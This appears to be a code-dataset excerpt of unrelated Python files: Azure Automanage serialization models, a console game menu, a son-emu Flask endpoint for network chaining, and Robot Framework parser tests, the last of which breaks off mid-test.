        self.vm_backup = kwargs.get('vm_backup')
        self.anti_malware = kwargs.get('anti_malware')
class ConfigurationProfilePreferenceUpdate(UpdateResource):
    """Update payload for a configuration profile preference.

    :param tags: A set of tags. The tags of the resource.
    :type tags: dict[str, str]
    :param properties: Properties of the configuration profile preference.
    :type properties: ~automanage_client.models.ConfigurationProfilePreferenceProperties
    """

    _attribute_map = {
        'tags': {'key': 'tags', 'type': '{str}'},
        'properties': {'key': 'properties', 'type': 'ConfigurationProfilePreferenceProperties'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.properties = kwargs.get('properties')
class ConfigurationProfilePreferenceVmBackup(msrest.serialization.Model):
    """VM Backup preferences for an Automanage configuration profile.

    :param time_zone: TimeZone optional input as string. For example: Pacific Standard Time.
    :type time_zone: str
    :param instant_rp_retention_range_in_days: Instant RP retention policy range in days.
    :type instant_rp_retention_range_in_days: int
    :param retention_policy: Retention policy with the details on backup copy retention ranges.
    :type retention_policy: str
    :param schedule_policy: Backup schedule specified as part of backup policy.
    :type schedule_policy: str
    """

    _attribute_map = {
        'time_zone': {'key': 'timeZone', 'type': 'str'},
        'instant_rp_retention_range_in_days': {'key': 'instantRpRetentionRangeInDays', 'type': 'int'},
        'retention_policy': {'key': 'retentionPolicy', 'type': 'str'},
        'schedule_policy': {'key': 'schedulePolicy', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.time_zone = kwargs.get('time_zone')
        self.instant_rp_retention_range_in_days = kwargs.get('instant_rp_retention_range_in_days')
        self.retention_policy = kwargs.get('retention_policy')
        self.schedule_policy = kwargs.get('schedule_policy')
class ErrorAdditionalInfo(msrest.serialization.Model):
    """Additional info attached to a resource management error.

    Server-populated variables are read-only and ignored on requests.

    :ivar type: The additional info type.
    :vartype type: str
    :ivar info: The additional info.
    :vartype info: object
    """

    _validation = {
        'type': {'readonly': True},
        'info': {'readonly': True},
    }

    _attribute_map = {
        'type': {'key': 'type', 'type': 'str'},
        'info': {'key': 'info', 'type': 'object'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Both fields are reported by the service only.
        self.type = None
        self.info = None
class ErrorResponse(msrest.serialization.Model):
    """Resource management error response envelope.

    :param error: The error object.
    :type error: ~automanage_client.models.ErrorResponseError
    """

    _attribute_map = {
        'error': {'key': 'error', 'type': 'ErrorResponseError'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.error = kwargs.get('error')
class ErrorResponseError(msrest.serialization.Model):
    """Detailed error object of a resource management error response.

    Server-populated variables are read-only and ignored on requests.

    :ivar code: The error code.
    :vartype code: str
    :ivar message: The error message.
    :vartype message: str
    :ivar target: The error target.
    :vartype target: str
    :ivar details: The error details.
    :vartype details: list[~automanage_client.models.ErrorResponse]
    :ivar additional_info: The error additional info.
    :vartype additional_info: list[~automanage_client.models.ErrorAdditionalInfo]
    """

    _validation = {
        'code': {'readonly': True},
        'message': {'readonly': True},
        'target': {'readonly': True},
        'details': {'readonly': True},
        'additional_info': {'readonly': True},
    }

    _attribute_map = {
        'code': {'key': 'code', 'type': 'str'},
        'message': {'key': 'message', 'type': 'str'},
        'target': {'key': 'target', 'type': 'str'},
        'details': {'key': 'details', 'type': '[ErrorResponse]'},
        'additional_info': {'key': 'additionalInfo', 'type': '[ErrorAdditionalInfo]'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Every field is reported by the service only.
        self.code = None
        self.message = None
        self.target = None
        self.details = None
        self.additional_info = None
class Operation(msrest.serialization.Model):
    """A single Automanage REST API operation.

    :param name: Operation name: For ex.
     providers/Microsoft.Automanage/configurationProfileAssignments/write or read.
    :type name: str
    :param is_data_action: Indicates whether the operation is a data action.
    :type is_data_action: str
    :param display: Provider, Resource, Operation and description values.
    :type display: ~automanage_client.models.OperationDisplay
    :param status_code: Status code reported under properties.statusCode.
    :type status_code: str
    """

    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'is_data_action': {'key': 'isDataAction', 'type': 'str'},
        'display': {'key': 'display', 'type': 'OperationDisplay'},
        'status_code': {'key': 'properties.statusCode', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.name = kwargs.get('name')
        self.is_data_action = kwargs.get('is_data_action')
        self.display = kwargs.get('display')
        self.status_code = kwargs.get('status_code')
class OperationDisplay(msrest.serialization.Model):
    """Human-readable display values for an operation.

    :param provider: Service provider: Microsoft.Automanage.
    :type provider: str
    :param resource: Resource on which the operation is performed: For ex.
    :type resource: str
    :param operation: Operation type: Read, write, delete, etc.
    :type operation: str
    :param description: Description about operation.
    :type description: str
    """

    _attribute_map = {
        'provider': {'key': 'provider', 'type': 'str'},
        'resource': {'key': 'resource', 'type': 'str'},
        'operation': {'key': 'operation', 'type': 'str'},
        'description': {'key': 'description', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.provider = kwargs.get('provider')
        self.resource = kwargs.get('resource')
        self.operation = kwargs.get('operation')
        self.description = kwargs.get('description')
class OperationList(msrest.serialization.Model):
    """Response payload for the list of Automanage operations.

    :param value: List of Automanage operations supported by the Automanage resource provider.
    :type value: list[~automanage_client.models.Operation]
    """

    _attribute_map = {
        'value': {'key': 'value', 'type': '[Operation]'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.value = kwargs.get('value')
class ProxyResource(Resource):
    """ARM proxy resource: everything from Resource, but no location or tags.

    Server-populated variables are read-only and ignored on requests.

    :ivar id: Fully qualified resource Id for the resource. Ex -
     /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
    :vartype id: str
    :ivar name: The name of the resource.
    :vartype name: str
    :ivar type: The type of the resource. Ex- Microsoft.Compute/virtualMachines or
     Microsoft.Storage/storageAccounts.
    :vartype type: str
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
| 35.353482
| 140
| 0.651502
|
4a0213e98e70b2d516cb4df0cd929847cfbadb40
| 415
|
py
|
Python
|
alura-python/games.py
|
wiltonpaulo/python-fullcourse
|
5befe60221a2e6f8a567a11e2f449245c11b3447
|
[
"MIT"
] | null | null | null |
alura-python/games.py
|
wiltonpaulo/python-fullcourse
|
5befe60221a2e6f8a567a11e2f449245c11b3447
|
[
"MIT"
] | null | null | null |
alura-python/games.py
|
wiltonpaulo/python-fullcourse
|
5befe60221a2e6f8a567a11e2f449245c11b3447
|
[
"MIT"
] | null | null | null |
import guess
import hangman
# Simple game launcher: show a menu, read the user's choice, dispatch.
print("*********************************")
print("*** Select one game to play ! ***")
print("*********************************")
print("(1) Hangman!")
print("(2) Guess the Number!")

# int() raises ValueError on non-numeric input; treat that as "no choice"
# instead of crashing with a traceback.
try:
    game = int(input("Which game? "))
except ValueError:
    game = None

if game == 1:
    print("Playing -> Game: Hangman! ...")
    hangman.play()
elif game == 2:
    print("Playing -> Game: Guess the Number! ...")
    guess.play()
else:
    # Previously any other input was silently ignored (or crashed).
    print("Invalid option! Please choose 1 or 2.")
| 23.055556
| 52
| 0.491566
|
4a0214f9be05e82ed9e70aa7e1e90c035282ef8d
| 2,607
|
py
|
Python
|
src/emuvim/api/rest/network.py
|
xilouris/son-emu
|
0eb78e7246730c70402a58551910ddf66927ada8
|
[
"Apache-2.0"
] | null | null | null |
src/emuvim/api/rest/network.py
|
xilouris/son-emu
|
0eb78e7246730c70402a58551910ddf66927ada8
|
[
"Apache-2.0"
] | null | null | null |
src/emuvim/api/rest/network.py
|
xilouris/son-emu
|
0eb78e7246730c70402a58551910ddf66927ada8
|
[
"Apache-2.0"
] | null | null | null |
import logging
from flask_restful import Resource
from flask import request
import json
logging.basicConfig(level=logging.INFO)
net = None
class NetworkAction(Resource):
    """
    Add or remove chains between VNFs. These chain links are implemented as flow entries in the networks' SDN switches.

    Request body fields (JSON):
    :param vnf_src_name: VNF name of the source of the link
    :param vnf_dst_name: VNF name of the destination of the link
    :param vnf_src_interface: VNF interface name of the source of the link
    :param vnf_dst_interface: VNF interface name of the destination of the link
    :param weight: weight of the link (can be useful for routing calculations)
    :param match: OpenFlow match format of the flow entry
    :param bidirectional: boolean value if the link needs to be implemented from src to dst and back
    :param cookie: cookie value, identifier of the flow entry to be installed.
    :return: message string indicating if the chain action is succesful or not
    """
    global net

    def put(self, vnf_src_name, vnf_dst_name):
        """Install a chain (flow entries) from src VNF to dst VNF."""
        logging.debug("REST CALL: network chain add")
        return self._NetworkAction(vnf_src_name, vnf_dst_name, command='add-flow')

    def delete(self, vnf_src_name, vnf_dst_name):
        """Remove the chain (flow entries) from src VNF to dst VNF."""
        logging.debug("REST CALL: network chain remove")
        return self._NetworkAction(vnf_src_name, vnf_dst_name, command='del-flows')

    def _NetworkAction(self, vnf_src_name, vnf_dst_name, command=None):
        # call DCNetwork method, not really datacenter specific API for now...
        # no check if vnfs are really connected to this datacenter...
        try:
            # Parse the request body once instead of once per field.
            payload = json.loads(request.json)
            c = net.setChain(
                vnf_src_name, vnf_dst_name,
                vnf_src_interface=payload.get("vnf_src_interface"),
                vnf_dst_interface=payload.get("vnf_dst_interface"),
                cmd=command,
                weight=payload.get("weight"),
                match=payload.get("match"),
                bidirectional=payload.get("bidirectional"),
                cookie=payload.get("cookie"))
            # return setChain response
            return str(c), 200
        except Exception as ex:
            logging.exception("API error.")
            # BUG FIX: `ex.message` only exists on Python 2; str(ex) is
            # portable and avoids an AttributeError inside the handler.
            return str(ex), 500
| 43.45
| 119
| 0.672804
|
4a0215b2d74a794ba0bce577562fe75e37c05ba3
| 43,088
|
py
|
Python
|
utest/parsing/test_model.py
|
anilameec/robotframework
|
8cd1680f9497c6991d6bcc7d057ab400f7151b9b
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2022-03-13T01:55:04.000Z
|
2022-03-13T01:55:04.000Z
|
utest/parsing/test_model.py
|
anilameec/robotframework
|
8cd1680f9497c6991d6bcc7d057ab400f7151b9b
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
utest/parsing/test_model.py
|
anilameec/robotframework
|
8cd1680f9497c6991d6bcc7d057ab400f7151b9b
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
import ast
import os
import unittest
import tempfile
from pathlib import Path
from robot.parsing import get_model, get_resource_model, ModelVisitor, ModelTransformer, Token
from robot.parsing.model.blocks import (
CommentSection, File, For, If, Try, While,
Keyword, KeywordSection, SettingSection, TestCase, TestCaseSection, VariableSection
)
from robot.parsing.model.statements import (
Arguments, Break, Comment, Continue, Documentation, ForHeader, End, ElseHeader,
ElseIfHeader, EmptyLine, Error, IfHeader, InlineIfHeader, TryHeader, ExceptHeader,
FinallyHeader, KeywordCall, KeywordName, ReturnStatement, SectionHeader,
TestCaseName, Variable, WhileHeader
)
from robot.utils.asserts import assert_equal, assert_raises_with_msg
from parsing_test_utils import assert_model, RemoveNonDataTokensVisitor
DATA = '''\
*** Test Cases ***
Example
# Comment
Keyword arg
...\targh
\t\t
*** Keywords ***
# Comment continues
Keyword
[Arguments] ${arg1} ${arg2}
Log Got ${arg1} and ${arg}!
RETURN x
'''
PATH = os.path.join(os.getenv('TEMPDIR') or tempfile.gettempdir(), 'test_model.robot')
EXPECTED = File(sections=[
CommentSection(
body=[
EmptyLine([
Token('EOL', '\n', 1, 0)
])
]
),
TestCaseSection(
header=SectionHeader([
Token('TESTCASE HEADER', '*** Test Cases ***', 2, 0),
Token('EOL', '\n', 2, 18)
]),
body=[
EmptyLine([Token('EOL', '\n', 3, 0)]),
TestCase(
header=TestCaseName([
Token('TESTCASE NAME', 'Example', 4, 0),
Token('EOL', '\n', 4, 7)
]),
body=[
Comment([
Token('SEPARATOR', ' ', 5, 0),
Token('COMMENT', '# Comment', 5, 2),
Token('EOL', '\n', 5, 11),
]),
KeywordCall([
Token('SEPARATOR', ' ', 6, 0),
Token('KEYWORD', 'Keyword', 6, 4),
Token('SEPARATOR', ' ', 6, 11),
Token('ARGUMENT', 'arg', 6, 15),
Token('EOL', '\n', 6, 18),
Token('SEPARATOR', ' ', 7, 0),
Token('CONTINUATION', '...', 7, 4),
Token('SEPARATOR', '\t', 7, 7),
Token('ARGUMENT', 'argh', 7, 8),
Token('EOL', '\n', 7, 12)
]),
EmptyLine([Token('EOL', '\n', 8, 0)]),
EmptyLine([Token('EOL', '\t\t\n', 9, 0)])
]
)
]
),
KeywordSection(
header=SectionHeader([
Token('KEYWORD HEADER', '*** Keywords ***', 10, 0),
Token('EOL', '\n', 10, 16)
]),
body=[
Comment([
Token('COMMENT', '# Comment', 11, 0),
Token('SEPARATOR', ' ', 11, 9),
Token('COMMENT', 'continues', 11, 13),
Token('EOL', '\n', 11, 22),
]),
Keyword(
header=KeywordName([
Token('KEYWORD NAME', 'Keyword', 12, 0),
Token('EOL', '\n', 12, 7)
]),
body=[
Arguments([
Token('SEPARATOR', ' ', 13, 0),
Token('ARGUMENTS', '[Arguments]', 13, 4),
Token('SEPARATOR', ' ', 13, 15),
Token('ARGUMENT', '${arg1}', 13, 19),
Token('SEPARATOR', ' ', 13, 26),
Token('ARGUMENT', '${arg2}', 13, 30),
Token('EOL', '\n', 13, 37)
]),
KeywordCall([
Token('SEPARATOR', ' ', 14, 0),
Token('KEYWORD', 'Log', 14, 4),
Token('SEPARATOR', ' ', 14, 7),
Token('ARGUMENT', 'Got ${arg1} and ${arg}!', 14, 11),
Token('EOL', '\n', 14, 34)
]),
ReturnStatement([
Token('SEPARATOR', ' ', 15, 0),
Token('RETURN STATEMENT', 'RETURN', 15, 4),
Token('SEPARATOR', ' ', 15, 10),
Token('ARGUMENT', 'x', 15, 14),
Token('EOL', '\n', 15, 15)
])
]
)
]
)
])
class TestGetModel(unittest.TestCase):
    """Verify ``get_model`` accepts a string, a path (str or Path) and an open file."""

    @classmethod
    def setUpClass(cls):
        # Write the shared source data to a temporary file once for all tests.
        with open(PATH, 'w') as outfile:
            outfile.write(DATA)

    @classmethod
    def tearDownClass(cls):
        os.remove(PATH)

    def test_from_string(self):
        assert_model(get_model(DATA), EXPECTED)

    def test_from_path_as_string(self):
        assert_model(get_model(PATH), EXPECTED, source=PATH)

    def test_from_path_as_path(self):
        assert_model(get_model(Path(PATH)), EXPECTED, source=PATH)

    def test_from_open_file(self):
        with open(PATH) as infile:
            parsed = get_model(infile)
        assert_model(parsed, EXPECTED)
class TestSaveModel(unittest.TestCase):
    """Verify ``model.save()`` both to the original source path and to explicit outputs."""

    @classmethod
    def setUpClass(cls):
        with open(PATH, 'w') as outfile:
            outfile.write(DATA)

    @classmethod
    def tearDownClass(cls):
        os.remove(PATH)

    def test_save_to_original_path(self):
        parsed = get_model(PATH)
        # Remove the source first to prove save() recreates it.
        os.remove(PATH)
        parsed.save()
        assert_model(get_model(PATH), EXPECTED, source=PATH)

    def test_save_to_different_path(self):
        parsed = get_model(PATH)
        target = PATH + '.robot'
        parsed.save(target)
        assert_model(get_model(target), EXPECTED, source=target)

    def test_save_to_original_path_as_path(self):
        parsed = get_model(Path(PATH))
        os.remove(PATH)
        parsed.save()
        assert_model(get_model(PATH), EXPECTED, source=PATH)

    def test_save_to_different_path_as_path(self):
        parsed = get_model(PATH)
        target = PATH + '.robot'
        parsed.save(Path(target))
        assert_model(get_model(target), EXPECTED, source=target)

    def test_save_to_original_fails_if_source_is_not_path(self):
        message = ('Saving model requires explicit output '
                   'when original source is not path.')
        assert_raises_with_msg(TypeError, message, get_model(DATA).save)
        with open(PATH) as infile:
            assert_raises_with_msg(TypeError, message, get_model(infile).save)
class TestForLoop(unittest.TestCase):
    """Parsing tests for FOR loops: plain, nested, and invalid variants."""

    def test_valid(self):
        model = get_model('''\
*** Test Cases ***
Example
    FOR    ${x}    IN    a    b    c
        Log    ${x}
    END
''', data_only=True)
        loop = model.sections[0].body[0].body[0]
        expected = For(
            header=ForHeader([
                Token(Token.FOR, 'FOR', 3, 4),
                Token(Token.VARIABLE, '${x}', 3, 11),
                Token(Token.FOR_SEPARATOR, 'IN', 3, 19),
                Token(Token.ARGUMENT, 'a', 3, 25),
                Token(Token.ARGUMENT, 'b', 3, 30),
                Token(Token.ARGUMENT, 'c', 3, 35),
            ]),
            body=[
                KeywordCall([Token(Token.KEYWORD, 'Log', 4, 8),
                             Token(Token.ARGUMENT, '${x}', 4, 15)])
            ],
            end=End([
                Token(Token.END, 'END', 5, 4)
            ])
        )
        assert_model(loop, expected)

    def test_nested(self):
        model = get_model('''\
*** Test Cases ***
Example
    FOR    ${x}    IN    1    2
        FOR    ${y}    IN RANGE    ${x}
            Log    ${y}
        END
    END
''', data_only=True)
        loop = model.sections[0].body[0].body[0]
        expected = For(
            header=ForHeader([
                Token(Token.FOR, 'FOR', 3, 4),
                Token(Token.VARIABLE, '${x}', 3, 11),
                Token(Token.FOR_SEPARATOR, 'IN', 3, 19),
                Token(Token.ARGUMENT, '1', 3, 25),
                Token(Token.ARGUMENT, '2', 3, 30),
            ]),
            body=[
                For(
                    header=ForHeader([
                        Token(Token.FOR, 'FOR', 4, 8),
                        Token(Token.VARIABLE, '${y}', 4, 15),
                        Token(Token.FOR_SEPARATOR, 'IN RANGE', 4, 23),
                        Token(Token.ARGUMENT, '${x}', 4, 35),
                    ]),
                    body=[
                        KeywordCall([Token(Token.KEYWORD, 'Log', 5, 12),
                                     Token(Token.ARGUMENT, '${y}', 5, 19)])
                    ],
                    end=End([
                        Token(Token.END, 'END', 6, 8)
                    ])
                )
            ],
            end=End([
                Token(Token.END, 'END', 7, 4)
            ])
        )
        assert_model(loop, expected)

    def test_invalid(self):
        # Broken FOR loops must produce error annotations, not exceptions.
        model = get_model('''\
*** Test Cases ***
Example
    FOR
    END    ooops
    FOR    wrong    IN
''', data_only=True)
        loop1, loop2 = model.sections[0].body[0].body
        expected1 = For(
            header=ForHeader(
                tokens=[Token(Token.FOR, 'FOR', 3, 4)],
                errors=('FOR loop has no loop variables.',
                        "FOR loop has no 'IN' or other valid separator."),
            ),
            end=End(
                tokens=[Token(Token.END, 'END', 4, 4),
                        Token(Token.ARGUMENT, 'ooops', 4, 11)],
                errors=("END does not accept arguments, got 'ooops'.",)
            ),
            errors=('FOR loop has empty body.',)
        )
        expected2 = For(
            header=ForHeader(
                tokens=[Token(Token.FOR, 'FOR', 6, 4),
                        Token(Token.VARIABLE, 'wrong', 6, 11),
                        Token(Token.FOR_SEPARATOR, 'IN', 6, 20)],
                errors=("FOR loop has invalid loop variable 'wrong'.",
                        "FOR loop has no loop values."),
            ),
            errors=('FOR loop has empty body.',
                    'FOR loop has no closing END.')
        )
        assert_model(loop1, expected1)
        assert_model(loop2, expected2)
class TestWhileLoop(unittest.TestCase):
    """Parsing tests for WHILE loops, including the ``limit`` option in the header."""

    def test_valid(self):
        model = get_model('''\
*** Test Cases ***
Example
    WHILE    True
        Log    ${x}
    END
''', data_only=True)
        loop = model.sections[0].body[0].body[0]
        expected = While(
            header=WhileHeader([
                Token(Token.WHILE, 'WHILE', 3, 4),
                Token(Token.ARGUMENT, 'True', 3, 13),
            ]),
            body=[
                KeywordCall([Token(Token.KEYWORD, 'Log', 4, 8),
                             Token(Token.ARGUMENT, '${x}', 4, 15)])
            ],
            end=End([
                Token(Token.END, 'END', 5, 4)
            ])
        )
        assert_model(loop, expected)

    def test_header_parsing(self):
        # data_only=False keeps separator/EOL tokens in the header.
        model = get_model('''\
*** Test Cases ***
Example
    WHILE    True    limit=100
        Log    ${x}
    END
''', data_only=False)
        header = model.sections[0].body[0].body[0].header
        expected = WhileHeader([
            Token(Token.SEPARATOR, '    ', 3, 0),
            Token(Token.WHILE, 'WHILE', 3, 4),
            Token(Token.SEPARATOR, '    ', 3, 9),
            Token(Token.ARGUMENT, 'True', 3, 13),
            Token(Token.SEPARATOR, '    ', 3, 17),
            Token(Token.OPTION, 'limit=100', 3, 21),
            Token(Token.EOL, '\n', 3, 30),
        ])
        assert_model(header, expected)
class TestIf(unittest.TestCase):
    """Parsing tests for block-form IF / ELSE IF / ELSE structures."""

    def test_if(self):
        model = get_model('''\
*** Test Cases ***
Example
    IF    True
        Keyword
        Another    argument
    END
''', data_only=True)
        node = model.sections[0].body[0].body[0]
        expected = If(
            header=IfHeader([
                Token(Token.IF, 'IF', 3, 4),
                Token(Token.ARGUMENT, 'True', 3, 10),
            ]),
            body=[
                KeywordCall([Token(Token.KEYWORD, 'Keyword', 4, 8)]),
                KeywordCall([Token(Token.KEYWORD, 'Another', 5, 8),
                             Token(Token.ARGUMENT, 'argument', 5, 19)])
            ],
            end=End([Token(Token.END, 'END', 6, 4)])
        )
        assert_model(node, expected)

    def test_if_else_if_else(self):
        # ELSE IF / ELSE branches are modelled as nested If nodes via ``orelse``.
        model = get_model('''\
*** Test Cases ***
Example
    IF    True
        K1
    ELSE IF    False
        K2
    ELSE
        K3
    END
''', data_only=True)
        node = model.sections[0].body[0].body[0]
        expected = If(
            header=IfHeader([
                Token(Token.IF, 'IF', 3, 4),
                Token(Token.ARGUMENT, 'True', 3, 10),
            ]),
            body=[
                KeywordCall([Token(Token.KEYWORD, 'K1', 4, 8)])
            ],
            orelse=If(
                header=ElseIfHeader([
                    Token(Token.ELSE_IF, 'ELSE IF', 5, 4),
                    Token(Token.ARGUMENT, 'False', 5, 15),
                ]),
                body=[
                    KeywordCall([Token(Token.KEYWORD, 'K2', 6, 8)])
                ],
                orelse=If(
                    header=ElseHeader([
                        Token(Token.ELSE, 'ELSE', 7, 4),
                    ]),
                    body=[
                        KeywordCall([Token(Token.KEYWORD, 'K3', 8, 8)])
                    ],
                )
            ),
            end=End([Token(Token.END, 'END', 9, 4)])
        )
        assert_model(node, expected)

    def test_nested(self):
        model = get_model('''\
*** Test Cases ***
Example
    IF    ${x}
        Log    ${x}
        IF    ${y}
            Log    ${y}
        ELSE
            Log    ${z}
        END
    END
''', data_only=True)
        node = model.sections[0].body[0].body[0]
        expected = If(
            header=IfHeader([
                Token(Token.IF, 'IF', 3, 4),
                Token(Token.ARGUMENT, '${x}', 3, 10),
            ]),
            body=[
                KeywordCall([Token(Token.KEYWORD, 'Log', 4, 8),
                             Token(Token.ARGUMENT, '${x}', 4, 15)]),
                If(
                    header=IfHeader([
                        Token(Token.IF, 'IF', 5, 8),
                        Token(Token.ARGUMENT, '${y}', 5, 14),
                    ]),
                    body=[
                        KeywordCall([Token(Token.KEYWORD, 'Log', 6, 12),
                                     Token(Token.ARGUMENT, '${y}', 6, 19)])
                    ],
                    orelse=If(
                        header=ElseHeader([
                            Token(Token.ELSE, 'ELSE', 7, 8)
                        ]),
                        body=[
                            KeywordCall([Token(Token.KEYWORD, 'Log', 8, 12),
                                         Token(Token.ARGUMENT, '${z}', 8, 19)])
                        ]
                    ),
                    end=End([
                        Token(Token.END, 'END', 9, 8)
                    ])
                )
            ],
            end=End([
                Token(Token.END, 'END', 10, 4)
            ])
        )
        assert_model(node, expected)

    def test_invalid(self):
        # Malformed IF structures are reported via ``errors`` on the nodes.
        model = get_model('''\
*** Test Cases ***
Example
    IF
    ELSE    ooops
    ELSE IF
    END    ooops

    IF
''', data_only=True)
        if1, if2 = model.sections[0].body[0].body
        expected1 = If(
            header=IfHeader(
                tokens=[Token(Token.IF, 'IF', 3, 4)],
                errors=('IF must have a condition.',)
            ),
            orelse=If(
                header=ElseHeader(
                    tokens=[Token(Token.ELSE, 'ELSE', 4, 4),
                            Token(Token.ARGUMENT, 'ooops', 4, 12)],
                    errors=("ELSE does not accept arguments, got 'ooops'.",)
                ),
                orelse=If(
                    header=ElseIfHeader(
                        tokens=[Token(Token.ELSE_IF, 'ELSE IF', 5, 4)],
                        errors=('ELSE IF must have a condition.',)
                    ),
                    errors=('ELSE IF branch cannot be empty.',)
                ),
                errors=('ELSE branch cannot be empty.',)
            ),
            end=End(
                tokens=[Token(Token.END, 'END', 6, 4),
                        Token(Token.ARGUMENT, 'ooops', 6, 11)],
                errors=("END does not accept arguments, got 'ooops'.",)
            ),
            errors=('IF branch cannot be empty.',
                    'ELSE IF after ELSE.')
        )
        expected2 = If(
            header=IfHeader(
                tokens=[Token(Token.IF, 'IF', 8, 4)],
                errors=('IF must have a condition.',)
            ),
            errors=('IF branch cannot be empty.',
                    'IF has no closing END.')
        )
        assert_model(if1, expected1)
        assert_model(if2, expected2)
class TestInlineIf(unittest.TestCase):
    """Parsing tests for inline IF expressions (single-row IF ... ELSE ...)."""

    def test_if(self):
        model = get_model('''\
*** Test Cases ***
Example
    IF    True    Keyword
''', data_only=True)
        node = model.sections[0].body[0].body[0]
        expected = If(
            header=InlineIfHeader([Token(Token.INLINE_IF, 'IF', 3, 4),
                                   Token(Token.ARGUMENT, 'True', 3, 10)]),
            body=[KeywordCall([Token(Token.KEYWORD, 'Keyword', 3, 18)])],
            # Inline IF gets a virtual END token with an empty value.
            end=End([Token(Token.END, '', 3, 25)])
        )
        assert_model(node, expected)

    def test_if_else_if_else(self):
        model = get_model('''\
*** Test Cases ***
Example
    IF    True    K1    ELSE IF    False    K2    ELSE    K3
''', data_only=True)
        node = model.sections[0].body[0].body[0]
        expected = If(
            header=InlineIfHeader([Token(Token.INLINE_IF, 'IF', 3, 4),
                                   Token(Token.ARGUMENT, 'True', 3, 10)]),
            body=[KeywordCall([Token(Token.KEYWORD, 'K1', 3, 18)])],
            orelse=If(
                header=ElseIfHeader([Token(Token.ELSE_IF, 'ELSE IF', 3, 24),
                                     Token(Token.ARGUMENT, 'False', 3, 35)]),
                body=[KeywordCall([Token(Token.KEYWORD, 'K2', 3, 44)])],
                orelse=If(
                    header=ElseHeader([Token(Token.ELSE, 'ELSE', 3, 50)]),
                    body=[KeywordCall([Token(Token.KEYWORD, 'K3', 3, 58)])],
                )
            ),
            end=End([Token(Token.END, '', 3, 60)])
        )
        assert_model(node, expected)

    def test_nested(self):
        # Nesting inline IFs is invalid; parser records errors but still builds nodes.
        model = get_model('''\
*** Test Cases ***
Example
    IF    ${x}    IF    ${y}    K1    ELSE    IF    ${z}    K2
''', data_only=True)
        node = model.sections[0].body[0].body[0]
        expected = If(
            header=InlineIfHeader([Token(Token.INLINE_IF, 'IF', 3, 4),
                                   Token(Token.ARGUMENT, '${x}', 3, 10)]),
            body=[If(
                header=InlineIfHeader([Token(Token.INLINE_IF, 'IF', 3, 18),
                                       Token(Token.ARGUMENT, '${y}', 3, 24)]),
                body=[KeywordCall([Token(Token.KEYWORD, 'K1', 3, 32)])],
                orelse=If(
                    header=ElseHeader([Token(Token.ELSE, 'ELSE', 3, 38)]),
                    body=[If(
                        header=InlineIfHeader([Token(Token.INLINE_IF, 'IF', 3, 46),
                                               Token(Token.ARGUMENT, '${z}', 3, 52)]),
                        body=[KeywordCall([Token(Token.KEYWORD, 'K2', 3, 60)])],
                        end=End([Token(Token.END, '', 3, 62)]),
                    )],
                ),
                errors=('Inline IF cannot be nested.',),
            )],
            errors=('Inline IF cannot be nested.',),
        )
        assert_model(node, expected)

    def test_assign(self):
        model = get_model('''\
*** Test Cases ***
Example
    ${x} =    IF    True    K1    ELSE    K2
''', data_only=True)
        node = model.sections[0].body[0].body[0]
        expected = If(
            header=InlineIfHeader([Token(Token.ASSIGN, '${x} =', 3, 4),
                                   Token(Token.INLINE_IF, 'IF', 3, 14),
                                   Token(Token.ARGUMENT, 'True', 3, 20)]),
            body=[KeywordCall([Token(Token.KEYWORD, 'K1', 3, 28)])],
            orelse=If(
                header=ElseHeader([Token(Token.ELSE, 'ELSE', 3, 34)]),
                body=[KeywordCall([Token(Token.KEYWORD, 'K2', 3, 42)])],
            ),
            end=End([Token(Token.END, '', 3, 44)])
        )
        assert_model(node, expected)

    def test_invalid(self):
        model = get_model('''\
*** Test Cases ***
Example
    ${x} =    ${y}    IF    ELSE    ooops    ELSE IF
''', data_only=True)
        node = model.sections[0].body[0].body[0]
        expected = If(
            header=InlineIfHeader([Token(Token.ASSIGN, '${x} =', 3, 4),
                                   Token(Token.ASSIGN, '${y}', 3, 14),
                                   Token(Token.INLINE_IF, 'IF', 3, 22),
                                   Token(Token.ARGUMENT, 'ELSE', 3, 28)]),
            body=[KeywordCall([Token(Token.KEYWORD, 'ooops', 3, 36)])],
            orelse=If(
                header=ElseIfHeader([Token(Token.ELSE_IF, 'ELSE IF', 3, 45)],
                                    errors=('ELSE IF must have a condition.',)),
                errors=('ELSE IF branch cannot be empty.',),
            ),
            end=End([Token(Token.END, '', 3, 52)])
        )
        assert_model(node, expected)
class TestTry(unittest.TestCase):
    """Parsing tests for TRY / EXCEPT / ELSE / FINALLY structures."""

    def test_try_except_else_finally(self):
        # Run both with and without non-data tokens; the latter are stripped
        # with RemoveNonDataTokensVisitor before comparison.
        for data_only in [True, False]:
            with self.subTest(data_only=data_only):
                model = get_model('''\
*** Test Cases ***
Example
    TRY
        Fail    Oh no!
    EXCEPT    does not match
        No operation
    EXCEPT    AS    ${exp}
        Log    Catch
    ELSE
        No operation
    FINALLY
        Log    finally here!
    END
''', data_only=data_only)
                node = model.sections[0].body[0].body[0]
                expected = Try(
                    header=TryHeader([Token(Token.TRY, 'TRY', 3, 4)]),
                    body=[KeywordCall([Token(Token.KEYWORD, 'Fail', 4, 8),
                                       Token(Token.ARGUMENT, 'Oh no!', 4, 16)])],
                    next=Try(
                        header=ExceptHeader([Token(Token.EXCEPT, 'EXCEPT', 5, 4),
                                             Token(Token.ARGUMENT, 'does not match', 5, 13)]),
                        body=[KeywordCall((Token(Token.KEYWORD, 'No operation', 6, 8),))],
                        next=Try(
